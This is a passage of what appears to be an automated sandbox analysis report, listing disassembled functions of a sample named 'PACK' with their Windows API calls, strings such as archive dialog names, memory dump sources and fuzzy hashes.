                                                                                                                                                                            • API String ID: 2506810119-3974614470
                                                                                                                                                                            • Opcode ID: 6ef881dd5a988541c620434992fd975ca408b14392bab1bf8370bbd936f9f1d3
                                                                                                                                                                            • Instruction ID: 206de857d4a0e29f50678d38c891a1f7d17620108b14d289ca9da95ce1a1376f
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ef881dd5a988541c620434992fd975ca408b14392bab1bf8370bbd936f9f1d3
                                                                                                                                                                            • Instruction Fuzzy Hash: 4B316F71A0021CABDB21AF99DC819AEBBFCEF85710F104066FA44D7225DA755E40EB90
                                                                                                                                                                            APIs
                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000000,00000000,?,?,00FFEAAF,00000000,00000000,00000000), ref: 00FFE803
                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00FFEAAF,00000000,00000000,00000000,00000000,00000000,00FF3FBF,00000000,00FF3FBF,0100AA70), ref: 00FFE831
                                                                                                                                                                            • GetLastError.KERNEL32(?,00FFEAAF,00000000,00000000,00000000,00000000,00000000,00FF3FBF,00000000,00FF3FBF,0100AA70,00000010,00FFD947,00000000,0100A9E8,00000010), ref: 00FFE862
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 2456169464-3080146196
                                                                                                                                                                            • Opcode ID: e964bce64952029db1f7a6b0b0ba22b2a2c90212f03a4f258f3b63c443d06cef
                                                                                                                                                                            • Instruction ID: 24fece482ae9ed8c05bdfa0e246fdc3bfd1c3f01a6885475975ded74723fe01c
                                                                                                                                                                            • Opcode Fuzzy Hash: e964bce64952029db1f7a6b0b0ba22b2a2c90212f03a4f258f3b63c443d06cef
                                                                                                                                                                            • Instruction Fuzzy Hash: 7D316F75A002199FDB24DF59DC81AFAB7B9EF48354F0444ADEA4AD72A0D730AD80CB60
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FD73BE
                                                                                                                                                                              • Part of subcall function 00FD399D: __EH_prolog.LIBCMT ref: 00FD39A2
                                                                                                                                                                            • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00FD7485
                                                                                                                                                                              • Part of subcall function 00FD7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FD7A24
                                                                                                                                                                              • Part of subcall function 00FD7A15: GetLastError.KERNEL32 ref: 00FD7A6A
                                                                                                                                                                              • Part of subcall function 00FD7A15: CloseHandle.KERNEL32(?), ref: 00FD7A79
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                                            • API String ID: 3813983858-639343689
                                                                                                                                                                            • Opcode ID: 0b8cbf28e651be5c398865d80c5ef16e67af015fde997db6b7c0449ab64c6c09
                                                                                                                                                                            • Instruction ID: c5e3a3d8777cd2ac60dce89236105281e72a8f3e810217c7ba71c98a63850ea9
                                                                                                                                                                            • Opcode Fuzzy Hash: 0b8cbf28e651be5c398865d80c5ef16e67af015fde997db6b7c0449ab64c6c09
                                                                                                                                                                            • Instruction Fuzzy Hash: B331C631E04344AADF22FBA4DC41BEE7B7AAB45310F084017F488EB242DB7D4E44A7A1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FD12D7: GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
                                                                                                                                                                              • Part of subcall function 00FD12D7: SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00FE9C15
                                                                                                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00FE9C2A
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00FE9C3F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                                                            • String ID: ASKNEXTVOL
                                                                                                                                                                            • API String ID: 445417207-3402441367
                                                                                                                                                                            • Opcode ID: 4022ba3b9d51b6820245eec5397551d1ae5381f3a90bb336b305d8ce9e833f61
                                                                                                                                                                            • Instruction ID: d641fae7519899bb2b304b3fd5047831cc66e56dce83957cef2e25652212535c
                                                                                                                                                                            • Opcode Fuzzy Hash: 4022ba3b9d51b6820245eec5397551d1ae5381f3a90bb336b305d8ce9e833f61
                                                                                                                                                                            • Instruction Fuzzy Hash: 45112C337081467FD632BFAADD08F7A37B9EB46750F240055F2409B155C7EA9902A735
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __fprintf_l_strncpy
                                                                                                                                                                            • String ID: $%s$@%s
                                                                                                                                                                            • API String ID: 1857242416-834177443
                                                                                                                                                                            • Opcode ID: 0469aab0f666183f9decffecb1f99abb6ecf6095e940e3d36cdcf325f25a6eac
                                                                                                                                                                            • Instruction ID: f2e2c53e17c5f0f6865c74926d33672454946c9d422480f91e6b553192455d83
                                                                                                                                                                            • Opcode Fuzzy Hash: 0469aab0f666183f9decffecb1f99abb6ecf6095e940e3d36cdcf325f25a6eac
                                                                                                                                                                            • Instruction Fuzzy Hash: 63216FB284030DAEEB21DFA4CC05FEE3BA9AF04710F080527FA54972A1D735D655EBA1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FD12D7: GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
                                                                                                                                                                              • Part of subcall function 00FD12D7: SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00FEA0FE
                                                                                                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00FEA116
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 00FEA144
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                                                            • String ID: GETPASSWORD1
                                                                                                                                                                            • API String ID: 445417207-3292211884
                                                                                                                                                                            • Opcode ID: 1da16f3611119c8d29dc46c3eccaa1f00c7076a0fd10d3a13b9bb1ed4e29fc69
                                                                                                                                                                            • Instruction ID: 11ed74bd88d314a96376aafeffdd661889e250a0a8e9255ea16fcf4b229ff920
                                                                                                                                                                            • Opcode Fuzzy Hash: 1da16f3611119c8d29dc46c3eccaa1f00c7076a0fd10d3a13b9bb1ed4e29fc69
                                                                                                                                                                            • Instruction Fuzzy Hash: 88110C3290415C76DB229E7A9C49FFB377CEB09710F000015FA85F7180C669A951AB72
                                                                                                                                                                            APIs
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FDB1DE
                                                                                                                                                                              • Part of subcall function 00FD3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD3E54
                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00FDB1FC
                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00FDB20C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                                                                            • String ID: %c:\
                                                                                                                                                                            • API String ID: 525462905-3142399695
                                                                                                                                                                            • Opcode ID: c874dbaa86ff7e85ae2b8cee601b24a1445f2b8d507e21499cbe03ac6e7e4488
                                                                                                                                                                            • Instruction ID: 216a06142800ad8b9967739c28051fc895caddd20b00a76ee051b7a8ab2a5990
                                                                                                                                                                            • Opcode Fuzzy Hash: c874dbaa86ff7e85ae2b8cee601b24a1445f2b8d507e21499cbe03ac6e7e4488
                                                                                                                                                                            • Instruction Fuzzy Hash: EC012653800311A59A217F259C86D3FB7ADEE95771B89440BF944C2292FB34D840E3B1
                                                                                                                                                                            APIs
                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00FDA865,00000008,00000000,?,?,00FDC802,?,00000000,?,00000001,?), ref: 00FE035F
                                                                                                                                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00FDA865,00000008,00000000,?,?,00FDC802,?,00000000), ref: 00FE0369
                                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00FDA865,00000008,00000000,?,?,00FDC802,?,00000000), ref: 00FE0379
                                                                                                                                                                            Strings
                                                                                                                                                                            • Thread pool initialization failed., xrefs: 00FE0391
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                            • String ID: Thread pool initialization failed.
                                                                                                                                                                            • API String ID: 3340455307-2182114853
                                                                                                                                                                            • Opcode ID: 3f4a1ff10fc006121535d5b3dea87219b58e077fc9fae8027a9f8684e2b897aa
                                                                                                                                                                            • Instruction ID: 7664b951004fecd9fb1633fa65c27a60df74e91bb44ef8f0981f6b965228d02b
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f4a1ff10fc006121535d5b3dea87219b58e077fc9fae8027a9f8684e2b897aa
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D1182B15007089FD3325F66DCC8AABFBECEB55355F10482EF1DA86201DAB529C0DB60
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                            • API String ID: 0-56093855
                                                                                                                                                                            • Opcode ID: 25af27ddb900b3a545b9288407ad81b1b4f0816da3498bdbc7a672e03b77d80c
                                                                                                                                                                            • Instruction ID: 9bc69de48f81ea4d080966dced2347153b26e2b34225d1851138ae181a621191
                                                                                                                                                                            • Opcode Fuzzy Hash: 25af27ddb900b3a545b9288407ad81b1b4f0816da3498bdbc7a672e03b77d80c
                                                                                                                                                                            • Instruction Fuzzy Hash: 5501D8725042C5AFD7229E56ED00E2BBFE9F7447A0F000426F5C5E2215D7BB9C21ABE1
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                            • Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                                                                                                                                                                            • Instruction ID: eb32d8f029c1b8302d2eae4ba851f59ecbc087d22d68cbc4ee319215c0e1b559
                                                                                                                                                                            • Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                                                                                                                                                                            • Instruction Fuzzy Hash: 1DA16C32D0478A9FDB21CF18C8817BEBBE1EF153E0F14416ED6859B2A1CA788D42D751
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00FD7F2C,?,?,?), ref: 00FDA03C
                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00FD7F2C,?,?), ref: 00FDA080
                                                                                                                                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00FD7F2C,?,?,?,?,?,?,?,?), ref: 00FDA101
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,?,00FD7F2C,?,?,?,?,?,?,?,?,?,?,?), ref: 00FDA108
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Create$CloseHandleTime
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2287278272-0
                                                                                                                                                                            • Opcode ID: c55217b62127d022fa0167d0c32d30708f7b818919b563ea53dad729572c0422
                                                                                                                                                                            • Instruction ID: 6e2a0e4bc5436b7bac7a0b07c3a3e7b94a007e8f5b14fb2ea3fd27fed8b2f8d5
                                                                                                                                                                            • Opcode Fuzzy Hash: c55217b62127d022fa0167d0c32d30708f7b818919b563ea53dad729572c0422
                                                                                                                                                                            • Instruction Fuzzy Hash: B441C3316483819AD731DF64DC45BAEBBEA9B85310F08091EB5D1D32C1D6A8DA4CEB53
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadBitmapW.USER32(00000065), ref: 00FEA508
                                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00FEA529
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00FEA551
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00FEA570
                                                                                                                                                                              • Part of subcall function 00FE963A: FindResourceW.KERNEL32(00000066,PNG,?,?,00FEA54A,00000066), ref: 00FE964B
                                                                                                                                                                              • Part of subcall function 00FE963A: SizeofResource.KERNEL32(00000000,75295780,?,?,00FEA54A,00000066), ref: 00FE9663
                                                                                                                                                                              • Part of subcall function 00FE963A: LoadResource.KERNEL32(00000000,?,?,00FEA54A,00000066), ref: 00FE9676
                                                                                                                                                                              • Part of subcall function 00FE963A: LockResource.KERNEL32(00000000,?,?,00FEA54A,00000066), ref: 00FE9681
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 142272564-0
                                                                                                                                                                            • Opcode ID: 0e79810199b57e2d0be1c6304e8410f4653700d6cc0d8dd02ccc959dcf71a067
                                                                                                                                                                            • Instruction ID: fadb1bb126381eb52447a9bb770bfb7e047c3bdb69e5f1f0075b00c24c833bce
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e79810199b57e2d0be1c6304e8410f4653700d6cc0d8dd02ccc959dcf71a067
                                                                                                                                                                            • Instruction Fuzzy Hash: 3E01263294038537C72273AA9C46E7F77AEDFC5B61F0C0025FA40A7285DE9A9C0263B1
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00FF1AA0
                                                                                                                                                                              • Part of subcall function 00FF20D8: ___AdjustPointer.LIBCMT ref: 00FF2122
                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00FF1AB7
                                                                                                                                                                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 00FF1AC9
                                                                                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00FF1AED
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2633735394-0
                                                                                                                                                                            • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                                                                                                            • Instruction ID: 1bc1b7ab47ca9ba6109279983f30017e7f5f2a2787635c7ba482d2f48156cb17
                                                                                                                                                                            • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                                                                                                            • Instruction Fuzzy Hash: B001053240014CEBCF129F95CC01EEA3BAAFF58754F044115FE1865130D73AE8A1EBA0
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00FF15E6
                                                                                                                                                                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00FF15EB
                                                                                                                                                                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00FF15F0
                                                                                                                                                                              • Part of subcall function 00FF268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00FF269F
                                                                                                                                                                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00FF1605
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
